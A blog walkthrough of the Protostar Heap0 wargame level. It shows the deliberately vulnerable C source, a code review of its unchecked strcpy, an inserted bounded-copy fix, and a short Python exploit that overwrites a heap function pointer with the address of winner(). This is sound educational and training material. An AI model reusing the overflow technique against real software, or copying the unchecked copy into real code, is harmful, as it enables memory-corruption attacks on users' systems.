Binary Exploitation Protostar Heap0 - Walkthrough - Writeups

Hello Guyz,

Welcome again to my blog. Today I am going to share my walkthrough of the Exploit Exercises Protostar Heap0 level.

In this level, our task is to execute the winner function by means of a heap overflow.


Before starting the walkthrough, let's take a look at the hints and details.

Note: I want to highlight a few points.

  • I'm not the creator of the Protostar war game; I am just a player.
  • Here I am just providing hints and references, so if you feel stuck anywhere, take a look here.
  • Understand all previous levels before starting this one.
  • Do some research on assembly, C/C++ and GDB.
  • Do some research on heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();

}

Hint

This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Code Review

  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));   <--- Allocates space for the data struct
  f = malloc(sizeof(struct fp));     <--- Allocates space for the fp struct, placed right after the data struct on the heap
  f->fp = nowinner;                  <--- Stores the address of nowinner in the fp struct's function pointer

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);          <--- No check on the length of argv[1]: anything longer than 64 bytes runs past name[] and into the fp chunk
  
  f->fp();                           <--- Calls whatever the function pointer now points to

Plan

As you can see, nothing in the source code checks the length of the user input. So we can overflow the heap buffer and overwrite the function pointer with the address of winner.
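The check the level is missing, as an added example that is not part of the original post or of Protostar: the same two allocations, but with the strcpy replaced by a bounded copy that rejects any input that does not fit in name[], so the function pointer in the neighbouring chunk can no longer be reached. The names set_name, run_level and run_level_fill are chosen here, and the inputs are constructed runs of 'a' of a given length.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct data { char name[64]; };
struct fp { int (*fp)(void); };
static int nowinner(void) { puts("level has not been passed"); return 0; }

/* Bounded replacement for heap0's strcpy(d->name, argv[1]): copies only
 * if src and its NUL fit in name[]. Returns 0 on success, -1 if the input
 * would have spilled past name[] into the neighbouring heap chunk. */
int set_name(struct data *d, const char *src)
{
    size_t n = 0;
    while (n < sizeof d->name && src[n] != '\0') n++;
    if (n == sizeof d->name)          /* no terminator within 64 bytes */
        return -1;
    memcpy(d->name, src, n + 1);
    return 0;
}

/* heap0's allocation sequence with the bounded copy. Returns 0 if the
 * input was accepted, 1 if it was rejected, -1 on allocation failure and
 * -2 if the function pointer was modified (must never happen now). */
int run_level(const char *input)
{
    struct data *d = malloc(sizeof *d);
    struct fp *f = malloc(sizeof *f);
    int rejected, intact;
    if (!d || !f) { free(d); free(f); return -1; }
    f->fp = nowinner;
    rejected = (set_name(d, input) != 0);
    intact = (f->fp == nowinner);     /* pointer still what main() set */
    f->fp();                          /* so this still calls nowinner */
    free(f); free(d);
    return intact ? rejected : -2;
}

/* Constructed input: len 'a' characters, like the "a"*72 padding in the
 * exploit, fed through run_level(). */
int run_level_fill(size_t len)
{
    char *buf = malloc(len + 1);
    int rc;
    if (!buf) return -1;
    memset(buf, 'a', len);
    buf[len] = '\0';
    rc = run_level(buf);
    free(buf);
    return rc;
}
```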

Implementation

  Heap Overview
 -------------------------------
 | name[64]              | fp  |
 -------------------------------
  
  Overflow name and write the address of winner into fp

Exploit

#!/usr/bin/python
# Python 2, as shipped on the Protostar VM.
# Usage: /opt/protostar/bin/heap0 $(python exploit.py)
import struct

# 72 bytes of padding: 64 bytes fill name[], and the following 8 bytes cover
# the malloc chunk header (prev_size and size fields) that sits between
# name[] and the fp struct, which is why fp lands 72 bytes after data.
buf = "a"*72

# Address of winner() in /opt/protostar/bin/heap0 (check it with
# `p winner` in gdb or objdump -d; the binary is not PIE)
win = 0x08048464
ret = struct.pack("<I", win)   # 32-bit little-endian, the target is i386

payload = ''
payload += buf                 # padding up to the function pointer
payload += ret                 # overwrite f->fp with winner
print payload

For a more detailed walkthrough, check the YouTube video playlist provided below.
